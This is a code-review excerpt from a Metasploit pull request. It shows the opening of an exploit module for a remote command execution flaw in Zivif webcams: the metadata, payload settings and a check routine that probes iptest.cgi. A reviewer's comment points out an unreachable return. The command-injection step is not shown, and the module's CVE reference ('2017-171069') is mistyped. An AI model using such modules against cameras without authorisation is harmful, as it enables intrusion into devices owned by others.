modules/exploits/unix/http/zivif_ipcheck_exec.rb

```diff
@@ -0,0 +1,88 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'             => "Zivif Camera Web Interface Blind Remote Command Execution ",
+      'Description'      => %q{
+          This module exploits a remote command execution vulnerability in Zivif 
+       webcams.  This is known to impact versions prior to and including v2.3.4.2103.
+       Exploit was reported in CVE-2017-17106.
+      },
+      'License'          => MSF_LICENSE,
+      'Author'           => [ 'Silas Cutler (p1nk)' ],
+      'References'       =>
+        [
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17106' ],
+          [ 'CVE', '2017-171069' ]
+        ],
+      'Platform'         => 'unix',
+      'Targets'          =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'Payload'        =>
+        { 
+          'Space'       => 1024,
+          'BadChars'    => "\x00\x27",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl'
+            }
+        },
+      'Privileged'       => false,
+      'DisclosureDate'   => "1 September 2017",
+      'DefaultTarget'    => 0))
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
+    unless res
+      vprint_error('Connection failed')
+      return Exploit::CheckCode::Unknown
+    end
+    if res.code && res.code == 200 
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
```

Comment:
The final `Exploit::CheckCode::Safe` can never be reached, due to the previous `if` / `else`.

Suggest:

```suggestion
    unless res.code && res.code == 200 
      return CheckCode::Safe
    end

    CheckCode::Detected
```